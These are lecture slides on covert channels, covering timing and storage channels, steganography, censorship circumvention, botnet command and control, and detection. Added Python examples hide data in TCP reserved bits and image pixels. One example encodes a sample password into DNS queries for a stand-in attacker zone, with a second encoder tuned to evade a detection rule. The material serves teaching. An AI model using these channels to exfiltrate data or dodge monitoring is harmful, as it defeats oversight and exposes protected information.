
Covert Channels

Paul Seymer [email protected]

Some (Good) Definitions

Covert Channels:

● (official) Prof. Fleck's Slide 9:

“A covert channel is a path for the illegal flow of information between subjects within a system, utilizing system resources that were not designed to be used for inter-subject communication.”

● “A path of illegal information flow using mediums not intended for communication” (a liberal paraphrasing)

● (general) Communication through a medium that violates a global security policy without violating local ones.

Some (Good) Definitions

● Prof. Fleck's Covert Channel Slide 9:

“two human users talking over coffee is not a covert channel”

● This is an example of an overt channel: communication channels being used as intended.

• downloading web content from a public web server

• using email to submit a class assignment to your TA

• talking to a relative on the telephone

• waving to a friend

Some More (Good) Definitions

Covert Channels:

● (general) Communication through a medium that violates a global security policy without violating local ones

● (specific) DoD standard: the Orange Book (TCSEC), circa early 1980s

● Storage Channel: via a shared storage location

● Timing Channel: via some observed event frequency

Timing Channels

● Sita and Rama want to communicate without anyone else knowing. They both sit on the same local network.

● Rama knows to watch his local network traffic starting at the top of every hour, for 5 minutes.

● Sita wants to send Rama the following message :

“Dogs barking. Can't fly without umbrella”

How could this be accomplished?

Timing Channels

● Sita converts her message into ASCII decimal values:

  D    o    g    s    (sp)  b    a r k i n g . C a n ' t f l y ...
  68   111  103  115  32    98   ...

● Sita pings (ICMP echo request) Rama's computer 68 times, then 111 times, then 103 times, ….

● Rama observes the network, counts the pings in each burst, and looks up the counts in an ASCII table to recover the text. (The two must also agree on how one count is separated from the next, e.g., a fixed pause between characters; otherwise 68 followed by 111 is indistinguishable from 179.)

Storage Channels

● Sita and Rama want to communicate. This time, Rama is in a foreign country, on a network that blocks the ICMP protocol, so the timing channel won't work.

● Rama is in another time zone, and the two won't be online at the same time.

● Sita must leave Rama the message via some Storage Channel, so he may retrieve it later, when he is online.

How could this be accomplished?

Storage Channels

● Sita runs a web server. Rama has access to the server via HTTP, and can download pages without raising suspicion.

● Sita sticks a reverse proxy in front of the web server that modifies outgoing TCP packets to store custom bit patterns in a reserved (unused) field of the packet header.

[Figure: TCP header layout. Source Port | Destination Port / Sequence Number / Acknowledgment Number / Data Offset | Reserved (3 bits, shown as 0 0 0) | Flags | Window Size / Checksum | Urgent Pointer. The three reserved bits are the field Sita writes into.]

● As these bits are usually ignored, they will remain when sent. (Caveat: only if nothing on the path normalizes the header. A scrubbing firewall or IDS normalizer that zeroes reserved bits, or a proxy that rebuilds the segment, silently destroys the channel.)

Storage Channels

● Rama connects to the server to download some web page.

● He has a browser plug-in that reads these bits, and reconstructs the message.

● But wait a sec... 3 bits can only hold values 0 through 7 ? Can this still be used?

● Sita and Rama must mitigate an issue with the channel's bandwidth (capacity), or create a larger channel.

● The two will need to modify how the messages are sent through the channel, as the most the channel can carry per packet (3 bits) is smaller than the message fragments that need to be sent.

● “D” = 68, which needs a minimum of 7 bits to send.

Channel Capacity

● Shannon-Hartley Theorem

  C = B log2(1 + S/N)

  B : bandwidth (Hz)
  S/N : signal power to noise power ratio

  * but let's assume a noiseless channel for now, where capacity is simply symbol width × symbol rate:

● Packets from Web Server : 10 packets / sec

● Sita's storage channel capacity: 3 bits * 10 packets / sec = 30 bits / sec
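As an added example (not from the slides), the storage channel above end to end in Python: Sita's proxy packs 7-bit ASCII into 3-bit symbols and writes one symbol per packet into the TCP header's reserved field; Rama's side reads the bits back and reassembles the text, and `channel_stats` applies the 3 bits × 10 packets/s capacity figure to the actual message. The header layout (data offset, 3 reserved bits, 9 flag bits) follows RFC 793 as updated by RFC 3168; the ports, sequence numbers, flags and the 10 packets/s rate are assumed values, and the checksum is left at zero rather than computed.

```python
"""Added example (not from the original slides): Sita's storage channel
in the 3 reserved bits of the TCP header, with the message fragmented
into 3-bit symbols so that 7-bit ASCII still fits.
Ports, sequence numbers, flags and the packet rate are assumed values."""
import struct

RESERVED_BITS = 3          # width of the unused field the data hides in
PACKETS_PER_SECOND = 10    # assumed web-server rate from the slide
TCP_FMT = "!HHIIHHHH"      # src, dst, seq, ack, off/res/flags, win, csum, urg

def build_tcp_header(src_port, dst_port, seq, ack, flags, window, reserved=0):
    """Pack a 20-byte TCP header (no options). 'reserved' is the 3-bit field
    between data offset and flags that normal stacks leave at zero.
    Checksum is left 0 here; a real proxy recomputes it after editing."""
    if not 0 <= reserved < (1 << RESERVED_BITS):
        raise ValueError("reserved value does not fit in 3 bits")
    data_offset = 5  # header length in 32-bit words
    off_res_flags = (data_offset << 12) | (reserved << 9) | (flags & 0x1FF)
    return struct.pack(TCP_FMT, src_port, dst_port, seq, ack,
                       off_res_flags, window, 0, 0)

def read_reserved(header):
    """Extract the 3 reserved bits from a packed TCP header."""
    off_res_flags = struct.unpack(TCP_FMT, header[:20])[4]
    return (off_res_flags >> 9) & 0x7

def to_symbols(message):
    """Fragment 7-bit ASCII text into 3-bit symbols (MSB first), padding
    the tail with zero bits so the final symbol is full."""
    bits = "".join(format(ord(c), "07b") for c in message)
    bits += "0" * (-len(bits) % RESERVED_BITS)
    return [int(bits[i:i + RESERVED_BITS], 2)
            for i in range(0, len(bits), RESERVED_BITS)]

def from_symbols(symbols, n_chars):
    """Reassemble n_chars characters from a list of 3-bit symbols."""
    bits = "".join(format(s, "03b") for s in symbols)
    return "".join(chr(int(bits[i:i + 7], 2)) for i in range(0, 7 * n_chars, 7))

def send(message):
    """Sita's proxy: one ordinary-looking packet (PSH|ACK) per 3-bit symbol."""
    return [build_tcp_header(80, 40000, 1000 + 1460 * i, 1, 0x018, 65535, sym)
            for i, sym in enumerate(to_symbols(message))]

def receive(headers, n_chars):
    """Rama's plug-in: read the reserved bits back out and rebuild the text."""
    return from_symbols([read_reserved(h) for h in headers], n_chars)

def channel_stats(message):
    """Noiseless capacity (bits/s), packets needed, and seconds needed."""
    n_packets = len(to_symbols(message))
    capacity = RESERVED_BITS * PACKETS_PER_SECOND
    return capacity, n_packets, n_packets / PACKETS_PER_SECOND

if __name__ == "__main__":
    msg = "Dogs barking. Can't fly without umbrella"
    pkts = send(msg)
    print(receive(pkts, len(msg)))
    print(channel_stats(msg))
```

Because each symbol rides on a packet that would have been sent anyway, the channel adds no traffic of its own, which is what makes it covert; its cost is capacity. The 40-character message needs 94 packets, or 9.4 s at the assumed rate, and any middlebox that clears reserved bits on the way reduces the capacity to zero.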

Some (Bad) Definitions

● The Characteristics section of the “Covert Channels” Wikipedia* page. Some True or False:

• Steganography is not a type of Covert Channel? (paragraph 2)

• Covert channels are hard to create in modern environments? (paragraph 1)

• Covert channels are easily detectable by “monitoring system performance”?

• A covert channel is not the same thing as a means for “disallowed” communication relayed through an Overt channel? (paragraph 3)

• “Secure operating systems can easily control legitimate Channels” (paragraph 3)

* http://en.wikipedia.org/wiki/Covert_channel

Some (Bad) Definitions

● The Characteristics section of the “Covert Channels” Wikipedia* page. Some True or False:

(false) • Steganography is not a type of Covert Channel? (paragraph 2)

(false) • Covert channels are hard to create in modern environments? (paragraph 1)

(false) • Covert channels are easily detectable by “monitoring system performance”?

(false) • A covert channel is not the same thing as a means for “disallowed” communication relayed through an Overt channel? (paragraph 3)

(false) • “Secure operating systems can easily control legitimate Channels” (paragraph 3)

* http://en.wikipedia.org/wiki/Covert_channel

Steganography

● Greek origin → steganos : “covered” + graphein : “to write”

● Broad definition : Hiding some information inside some thing so that an outside observer cannot distinguish the version of the thing with the hidden information from the version without it.

● Examples:

• Replacing bits in an image file, with bits from some message

• Writing on a post card with “disappearing ink” (ink that is only viewable after contact with some chemical)

• Replacing every 20th frame of a video (like in the Pitt, Norton movie)

● The thing being hidden within is the Cover and provides a Cover Channel. The means through which information is hidden in the Cover provides the Covert Channel.

Steganography

[Figure, reconstructed: a 3×3 pixel grid with cells labelled 7 1 8 / 2 5 4 / 3 6 (one cell unlabelled).]

[Figure, reconstructed: the same grid with each pixel's 24-bit RGB value in hex. Cover colour 789BEC; stego pixel values 789BDC, 789BED, 689BEC, 788BEC, 789AEC, 789BEC, 779BEC, F3EDAC.]

Pixel 1: 789BED vs. cover 789BEC
  78 = 01111000   9B = 10011011   ED = 11101101 (cover EC = 11101100)
  → 1 bit / pixel

Pixel 8: 689BEC vs. cover 789BEC
  68 = 01101000 (cover 78 = 01111000)   9B = 10011011   EC = 11101100
  → 1 bit / pixel

Pixel 6: F3EDAC
  F3 = 11110011   ED = 11101101   AC = 10101100
  What is the channel capacity? 9 bit / pixel

Better Steganography

● “Russian Spies' Use of Steganography Is Just the Beginning” (2010) http://www.technologyreview.com/view/419833/russian-spies-use-of-steganography-is-just-the-beginning/

● “Silent Skype calls can hide secret messages” (2013) http://www.newscientist.com/article/dn23044-silent-skype-calls-can-hide-secret-messages.html#.Undaa_k_tXs

● “4 New Ways to Smuggle Messages Across the Internet” (2013) http://spectrum.ieee.org/telecom/security/4-new-ways-to-smuggle-messages-across-the-internet

Steganography creates a covert channel over an overt channel, by hiding secrets within a cover channel.
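Added example, not from the slides: the least-significant-bit embedding sketched in the pixel figure, run over a constructed 3×3 image whose pixels are all the cover colour 789BEC. `embed` writes payload bits into the low bits of each R, G, B value, `extract` reads them back, and `bits_changed` counts how many cover bits were altered, the cost that makes heavier embedding (3 LSBs per channel, 9 bits per pixel) easier to spot. Pixels are plain (R, G, B) tuples, so no image library is needed; the payloads are made up.

```python
"""Added example (not from the original slides): LSB steganography over a
constructed 3x3 image whose every pixel is the slide's cover colour
0x789BEC. 'lsbs' is how many low bits per colour channel are overwritten,
so capacity is 3 * lsbs bits per pixel (1 LSB -> 3 bits/pixel,
3 LSBs -> 9 bits/pixel). Pixels are (R, G, B) tuples."""

COVER = [(0x78, 0x9B, 0xEC)] * 9      # constructed 3x3 cover image

def message_bits(payload: bytes):
    """Payload bits, most significant bit of each byte first."""
    return [(byte >> i) & 1 for byte in payload for i in range(7, -1, -1)]

def capacity_bits(pixels, lsbs=1):
    """Total capacity of the cover: three channels times lsbs per pixel."""
    return 3 * lsbs * len(pixels)

def fits(pixels, payload: bytes, lsbs=1):
    return 8 * len(payload) <= capacity_bits(pixels, lsbs)

def embed(pixels, payload: bytes, lsbs=1):
    """Overwrite the low 'lsbs' bits of each R, G, B value with payload bits.
    Channels after the end of the payload keep their cover value."""
    if not fits(pixels, payload, lsbs):
        raise ValueError("payload exceeds cover capacity")
    bits, pos, mask, stego = message_bits(payload), 0, (1 << lsbs) - 1, []
    for pixel in pixels:
        channels = []
        for c in pixel:
            if pos < len(bits):
                chunk = bits[pos:pos + lsbs]
                pos += len(chunk)
                # a short final chunk is padded with the cover's own low bits
                chunk += [(c >> (lsbs - 1 - i)) & 1 for i in range(len(chunk), lsbs)]
                value = 0
                for b in chunk:
                    value = (value << 1) | b
                c = (c & ~mask) | value
            channels.append(c)
        stego.append(tuple(channels))
    return stego

def extract(pixels, n_bytes, lsbs=1):
    """Read the low bits back out in the same channel order and rebuild bytes."""
    need, bits, mask = 8 * n_bytes, [], (1 << lsbs) - 1
    for pixel in pixels:
        for c in pixel:
            for i in range(lsbs - 1, -1, -1):
                if len(bits) < need:
                    bits.append(((c & mask) >> i) & 1)
    if len(bits) < need:
        raise ValueError("cover too small for requested length")
    return bytes(int("".join(map(str, bits[i:i + 8])), 2) for i in range(0, need, 8))

def bits_changed(cover, stego):
    """Hamming distance between cover and stego: the price paid in visibility."""
    return sum(bin(a ^ b).count("1")
               for pa, pb in zip(cover, stego) for a, b in zip(pa, pb))

def hexpixel(pixel):
    return "{:02X}{:02X}{:02X}".format(*pixel)

if __name__ == "__main__":
    stego = embed(COVER, b"A", lsbs=1)
    print([hexpixel(p) for p in stego])           # second pixel becomes 789AEC
    print(extract(stego, 1), bits_changed(COVER, stego))
    wide = embed(COVER, b"Hi", lsbs=3)             # 9 bits/pixel, more visible
    print(extract(wide, 2, lsbs=3), bits_changed(COVER, wide))
```

Hiding a single “A” with one LSB per channel touches one bit across the nine pixels (the second pixel becomes 789AEC); the same byte with three LSBs per channel fits in the first pixel alone but flips five of its bits. Real covers are not a uniform colour, and a detector compares LSB statistics against what natural images produce, which is why the reprocessing defences later in the deck (recompression, format conversion) work: they rewrite exactly the bits the channel lives in.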

The difference then becomes a matter of intent. The nature of the message decides if it is a covert channel or an overt one...if the intent of the sender is to communicate covertly, in a way other than the intended use of the channel, it is...by definition, a covert channel.

Not-So-Obvious Covert Channels

“a”

Not-So-Obvious Covert Channels

“a” could mean:

• “a”

• “0”

• “61”

• “Attack at dawn”

• “Get to the embassy asap”

Pre-shared knowledge between sender and receiver dictates the contents of the channel

Book Ciphers

● A means of sending secret messages where a book (remember those?) was used as an index reference for code words. Only the sender and receiver know which book to use.

● A message sender would send a receiver a list of places in the book to look up and find the message word.

● Index Examples:

 400, 302, 423

 Page 6, line 2, character position 6

● “Book” examples

 A particular edition of an English dictionary

 A particular translation of the Bible.

More Covert Channels

● “DNS as a Covert Channel Within Protected Networks” Seth Bromberger, NESCO http://energy.gov/sites/prod/files/oeprod/DocumentsandMedia/DNS_Exfiltration_2011-01-01_v1.1.pdf

● “Embedding Covert Channels into TCP/IP” Steven J. Murdoch and Stephen Lewis, http://www.cl.cam.ac.uk/~sjm217/papers/ih05coverttcp.pdf

● Embedding plain text, over HTTP

• Leveraging the volume of HTTP traffic, and variation on content

• How is this Overt? How is this Covert? Will using HTTP change your answers? SSH Tunneling? Is this Covert, or Overt?
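The DNS paper above describes carrying data out in query names. As an added example, not from the slides or from any of the cited papers, the following Python builds such queries two ways and runs a naive anomaly rule over them: a fast encoder that fills each label with base32 (long, high-entropy subdomains that the rule catches) and a slow encoder that spells one byte per query as two dictionary words (short, low-entropy subdomains that pass). The zone name, the word list and the secret are constructed for the example; the 63-byte label limit comes from RFC 1035.

```python
"""Added example, not from the slides or the papers cited above: data
smuggled out in DNS query names, a naive anomaly rule, and a slower
encoder tuned to pass that rule. The zone name, word list and secret
are constructed for the example."""
import base64
import math
from collections import Counter

DOMAIN = "cdn-updates.example"   # assumed attacker-controlled zone
CHUNK = 35                       # 35 bytes -> 56 base32 chars, under the 63-byte label limit
WORDS = ["cache", "image", "video", "audio", "fonts", "media", "thumb", "cover",
         "build", "patch", "track", "theme", "style", "pixel", "embed", "frame"]

def exfil_queries(secret: bytes):
    """Fast channel: one base32 label per 35-byte chunk, sequence number first."""
    names = []
    for seq, i in enumerate(range(0, len(secret), CHUNK)):
        label = base64.b32encode(secret[i:i + CHUNK]).decode().rstrip("=").lower()
        names.append(f"{seq}.{label}.{DOMAIN}")
    return names

def reassemble(names):
    """Authoritative-server side: reorder by sequence number and decode."""
    parts = {}
    for name in names:
        seq, label, _zone = name.split(".", 2)
        label = label.upper() + "=" * (-len(label) % 8)   # restore base32 padding
        parts[int(seq)] = base64.b32decode(label)
    return b"".join(parts[k] for k in sorted(parts))

def entropy(text: str) -> float:
    """Shannon entropy in bits per character."""
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())

def looks_like_exfil(name: str, max_len=30, max_entropy=4.0) -> bool:
    """Naive anomaly rule: a long or high-entropy subdomain is 'malicious'."""
    sub = name[:-(len(DOMAIN) + 1)]
    return len(sub) > max_len or entropy(sub) > max_entropy

def quiet_queries(secret: bytes):
    """Slow channel: one byte per query, spelled as two dictionary words.
    Subdomains stay short and low-entropy, so the rule above passes them."""
    return [f"{WORDS[b >> 4]}-{WORDS[b & 0xF]}.s{seq}.{DOMAIN}"
            for seq, b in enumerate(secret)]

def quiet_reassemble(names):
    out = {}
    for name in names:
        pair, seqlabel = name.split(".")[:2]
        hi, lo = pair.split("-")
        out[int(seqlabel[1:])] = (WORDS.index(hi) << 4) | WORDS.index(lo)
    return bytes(out[k] for k in sorted(out))

def demo():
    secret = b"user:alice pass:hunter2"    # constructed sample payload
    fast, quiet = exfil_queries(secret), quiet_queries(secret)
    return {
        "fast_ok": reassemble(fast) == secret,
        "fast_flagged": sum(map(looks_like_exfil, fast)),
        "fast_queries": len(fast),
        "quiet_ok": quiet_reassemble(quiet) == secret,
        "quiet_flagged": sum(map(looks_like_exfil, quiet)),
        "quiet_queries": len(quiet),
    }

if __name__ == "__main__":
    print(demo())
```

The quiet encoder needs 23 queries for 23 bytes where the fast one needs a single query: that is the trade between capacity and detectability that every covert channel makes. A detector worth deploying would look at query rate per client and the number of distinct subdomains per zone over time rather than at one name in isolation, since per-name rules are exactly what the second encoder is shaped to pass.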

Using Covert Channels

● (almost) Everything is “Dual Use”

• Using magical powers for good

 Protecting free speech and free press

 Protecting other forms of clandestine communication

• Using magical powers for evil

 Communicating illegal content

 Exfiltrating data out of “secure” environments

 Coordinating Terrorist Attacks

 Controlling Botnets and RATs

Prisoner Problem

● “The Prisoner's Problem and the Subliminal Channel” Gustavus J. Simmons (CRYPTO '83) http://www.iacr.org/cryptodb/data/paper.php?pubkey=1754

● Two prisoners, physically isolated from one another wish to communicate: They create a covert channel within legitimate looking messages (the cover channel).

● The warden's employees transport the messages only if they appear to be innocent (i.e., an overt channel)

“Journalist” Adversary Model

● A foreign correspondent “Jill” is reporting under a cover identity in a country without a free press, ruled by an oppressive regime.

● Jill wishes to submit an inflammatory news story about the regime to her bosses back home.

● The Regime owns every domestic ISP, and is capable of filtering inbound and outbound Internet traffic based on IP address and TCP/UDP port.

● The Regime has the capability of terminating all Internet communication, but typically does not do so due to financial and commercial impact. They must selectively block as needed.

How can Jill submit her story? What safety factors concern her?

“Activist” Adversary Model

● A citizen “Jim” has political beliefs that differ from those of his government. Jim lives in a country where free speech is weakly protected, and most press is controlled by the government and heavily censored.

● Jim wishes to organize a large scale anti-government protest during the next “election” (he's a really big thinker), and will need to communicate with many other citizens.

● The Regime temporarily terminates Internet connectivity, but leaves domestic network services (in-country blogging, email, pizza delivery websites, etc.) running, and deploys high powered wireless jamming technology over its major cities.

How can Jim organize with his peers? What safety factors concern him?

“Journalist” Adversary Model

● Jill cares about:

• Protecting her location and cover identity

• Protecting the names of any sources in her article

• Ensuring the story is not modified en-route

● Jim cares about:

• Non-Attribution of the messages

• Protecting the identity of his peers

• Ensuring the messages are secret at least until the election cycle is over

Covert Channel Design Goals

Using covert channels has advanced well beyond the notion of simple secret communication:

● Reliability: The channel should consistently be available for use...e.g. comms shouldn't be “called off for rain”.

● Resilience: The channel should resist blocking, or have redundant paths from sender to receiver in the event blocking can occur

● (Non)-Attribution: The channel should provide un-linkability (for whomever is at risk should they be tied to some comms)

● Message Secrecy: The channel should provide a means by which the messages being sent are kept secret from an observer during transit. Why not just use encryption?

What's wrong with Encryption?

● Encryption can be defeated, particularly when it is misused: weak or outdated algorithms, flawed implementations, and compromised keys all break secrecy

● Encryption raises suspicion: “Why is this one host sending random looking bit streams of fixed length to an IP address in a foreign country”? ← this can be an “anomaly”

● Encryption may be computationally impractical for the receiver

• although, this really isn't a problem anymore, when even our wristwatches can browse the Internet

● But...Encryption may be optimal for providing secrecy, requiring another means to provide non-attribution and other services.

Covert Channels for “Good”

● “Evading Censorship with Browser-Based Proxies” (PETS 2012) D. Fifield, N. Hardison, J. Ellithorpe, E. Stark, R. Dingledine, P. Porras, and D. Boneh

• Short lifetime proxies, running as plug-ins in browsers on hosts in a non-censored region.

• Interfaces with Tor network, relaying Tor communications.

• The secret sauce is the notion that the large number of potential hosts able to provide proxy services will outnumber the Adversary's ability to block them all.

Question: Is this a Covert Channel? Why? Why Not?

Covert Channels for “Good”

● “Telex: Anticensorship in the network infrastructure” Wustrow, E., Wolchok, S., Goldberg, I., Halderman, J.A (USENIX 2011)

 “friendly” ISPs outside of a censored region collude with Jill or Jim to relay traffic to censored destinations.

 Innocent web requests are “tagged” in a way that the friendly ISP can detect, but the censor cannot.

 The “friendly” ISP intercepts these requests and proxies them to the censored destination on behalf of Jill or Jim.

 The censor sees communication with a safe website

Question: Is this a Covert Channel? Why? Why Not?

Covert Channels for “Good”

● “Message In A Bottle: Sailing Past Censorship” Luca Invernizzi, Christopher Kruegel and Giovanni Vigna (HOTPETS '12 )

 Two parties communicate over a common blog (via comments, or posts)

 Each party can “monitor” a blog, which is a feature that sends notifications to an email list when new messages are posted.

 A sender embeds secret messages in an image, and posts it to a blog “monitored” by the receiver.

 The receiver obtains the posted image, and recovers the hidden content

Question: Is this a Covert Channel? Why? Why Not?

Using Covert Channels

● (almost) Everything is “Dual Use”

• Using magical powers for good

 Protecting free speech and free press

 Protecting other forms of clandestine communication

• Using magical powers for evil

 Communicating illegal content

 Exfiltrating data out of “secure” environments

 Coordinating illegal acts

 Controlling Botnets and RATs

Controlling Botnets

● What are Botnets?

● What are the components of a botnet?

• the bot

• the bot master (a.k.a. bot herder, or the person behind the keyboard)

• the command and control channel (C2)

● What is a RAT?

• Remote Access Tool, Remote Access Trojan, Remote Administration Tool, etc....

• Sometimes a type of botnet, sometimes with C2.

Controlling Botnets

● What does this have to do with covert channels?

● The Bot Master has the same needs as Jill and Jim

• secrecy

• non-attribution

• reliability

• So...its C2 channel is often a covert channel

• Goals:

• Subvert a network's IDS (let's assume static signatures won't work)

• Means:

• Look like an employee on the network (Avoid anomaly detection)


Controlling Botnets

Some (casual) additional reading:

● https://blog.damballa.com/archives/tag/poison-ivy

● http://www.informationweek.com/security/vulnerabilities/blackhole-botnet-creator-buys-up-zero-da/240145769

● http://www.redteamsecure.com/labs/post/28/Botnet-Command-and-Control-via-Covert-Channels

● http://www.irongeek.com/i.php?page=security/steganographic-command-and-control

Data Exfiltration Channels

● Some data is monitored to ensure proper use and nondisclosure

• Classified documents

• Trade Secrets

• Passwords (e.g. from a keylogger)

● Covert Channels can be used to exfiltrate this data : bypass mechanisms put in place to maintain control over the release and use of some data, in order to deliver it to unauthorized entities

• Using any of the types of channels we have discussed.

Mitigating Covert Channels

● Detection

● Eliminating

● Constricting Bandwidth

● Monitoring/Intelligence Gathering

Detecting Covert Channels

● ...is very very hard

● Claim: “Secure” environments know what benign communication looks like...so just deploy an anomaly detector to find things that look “malicious.”

[Images: http://xkcd.com/927/ and http://en.wikipedia.org/wiki/File:Rumsfeld1.jpg]

Detecting Covert Channels

● Anomaly detection often fails:

• Enumerating all “good” behavior is difficult, and expensive

• Covert Channels are designed to “look like” overt channels

• False Positives are expensive

● Network malfeasance is often a reaction to defensive capability.

● Network defense is often a reaction to detected malfeasance.

Adversaries, then, usually have a time advantage, unless the defender can see into the future. Defenders also typically have more operational constraints. Adversaries rarely “play by the rules;” defenders often do, or must.

Eliminating Covert Channels

● Reprocessing Images “just in case” they have something hidden in them.

• Compressing an image (this will often overwrite the hidden content)

• Converting a lossless image to a lossy format (or vice versa)...or converting file formats in general.

Effective, but expensive. Why?

Constricting Channel Bandwidth

● Simply: lower network throughput, or restrict the number of connections a single user or host can make over some period of time.

● If the covert channel itself has a low capacity, it will take longer to relay a message. Reducing network throughput exacerbates this problem, potentially rendering the channel unusable.

Monitoring / Intelligence Gathering

● Perhaps the most threatening to Jill and Jim

● An adversary can passively eavesdrop on a channel (undetectable, by definition) and potentially collect intelligence on the channel, its participants, its goals, and any details needed in order to defeat it.

● “Rubber Hose Attack” https://www.schneier.com/blog/archives/2008/10/rubber_hose_cry.html http://bojinov.org/professional/usenixsec2012-rubberhose.pdf

http://xkcd.com/538/

Q + A